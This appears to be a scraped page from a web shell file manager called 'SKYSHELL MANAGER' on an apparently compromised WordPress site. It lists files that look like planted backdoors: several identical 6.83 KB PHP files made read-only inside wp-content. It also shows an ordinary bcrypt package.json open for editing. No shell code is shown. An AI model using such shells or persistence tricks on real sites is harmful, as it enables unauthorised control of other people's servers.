📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
voigtlaborg
/
wp-content
/
Name
Size
Perm
Actions
📁
themes
-
0755
🗑️
🏷️
🔒
📄
api.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
goods.php
173.77 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "_from": "bcrypt@^3.0.6", "_id": "bcrypt@3.0.8", "_inBundle": false, "_integrity": "sha512-jKV6RvLhI36TQnPDvUFqBEnGX9c8dRRygKxCZu7E+MgLfKZbmmXL8a7/SFFOyHoPNX9nV81cKRC5tbQfvEQtpw==", "_location": "/bcrypt", "_phantomChildren": {}, "_requested": { "type": "range", "registry": true, "raw": "bcrypt@^3.0.6", "name": "bcrypt", "escapedName": "bcrypt", "rawSpec": "^3.0.6", "saveSpec": null, "fetchSpec": "^3.0.6" }, "_requiredBy": [ "#USER", "/" ], "_resolved": "https://registry.npmjs.org/bcrypt/-/bcrypt-3.0.8.tgz", "_shasum": "fe437b7569faffc1105c3c3f6e7d2913e3d3bea5", "_spec": "bcrypt@^3.0.6", "_where": "/var/www/locationer/locationer", "author": { "name": "Nick Campbell", "url": "https://github.com/ncb000gt" }, "binary": { "module_name": "bcrypt_lib", "module_path": "./lib/binding/", "package_name": "{module_name}-v{version}-{node_abi}-{platform}-{arch}-{libc}.tar.gz", "host": "https://github.com/kelektiv/node.bcrypt.js/releases/download/", "remote_path": "v{version}" }, "bugs": { "url": "https://github.com/kelektiv/node.bcrypt.js/issues" }, "bundleDependencies": false, "contributors": [ { "name": "Antonio Salazar Cardozo", "email": "savedfastcool@gmail.com", "url": "https://github.com/Shadowfiend" }, { "name": "Van Nguyen", "email": "the.gol.effect@gmail.com", "url": "https://github.com/thegoleffect" }, { "name": "David Trejo", "email": "david@dtrejo.com", "url": "https://github.com/dtrejo" }, { "name": "Ben Glow", "email": "glen.low@pixelglow.com", "url": "https://github.com/pixelglow" }, { "name": "NewITFarmer.com", "url": "https://github.com/newitfarmer" }, { "name": "Alfred Westerveld", "email": "alfredwesterveld@gmail.com", "url": "https://github.com/alfredwesterveld" }, { "name": "Vincent Côté-Roy", "email": "vincentcr@gmail.com", "url": "https://github.com/vincentcr" }, { "name": "Lloyd Hilaiel", "email": "lloyd@hilaiel.com", "url": "https://github.com/lloyd" }, { "name": "Roman Shtylman", "email": "shtylman@gmail.com", "url": "https://github.com/shtylman" }, { "name": "Vadim Graboys", "email": "dimva13@gmail.com", "url": "https://github.com/vadimg" }, { "name": "Ben Noorduis", "url": "https://github.com/bnoordhuis" }, { "name": "Nate Rajlich", "email": "nathan@tootallnate.net", "url": "https://github.com/tootallnate" }, { "name": "Sean McArthur", "email": "sean.monstar@gmail.com", "url": "https://github.com/seanmonstar" }, { "name": "Fanie Oosthuysen", "email": "fanie.oosthuysen@gmail.com", "url": "https://github.com/weareu" }, { "name": "Amitosh Swain Mahapatra", "email": "amitosh.swain@gmail.com", "url": "https://github.com/Agathver" }, { "name": "Corbin Crutchley", "email": "crutchcorn@gmail.com", "url": "https://github.com/crutchcorn" } ], "dependencies": { "nan": "2.14.0", "node-pre-gyp": "0.14.0" }, "deprecated": false, "description": "A bcrypt library for NodeJS.", "devDependencies": { "nodeunit": "^0.11.3" }, "engines": { "node": ">= 6.0.0" }, "homepage": "https://github.com/kelektiv/node.bcrypt.js#readme", "keywords": [ "bcrypt", "password", "auth", "authentication", "encryption", "crypt", "crypto" ], "license": "MIT", "main": "./bcrypt", "name": "bcrypt", "repository": { "type": "git", "url": "git+https://github.com/kelektiv/node.bcrypt.js.git" }, "scripts": { "install": "node-pre-gyp install --fallback-to-build", "test": "npm install --build-from-source && nodeunit test" }, "version": "3.0.8" }
Save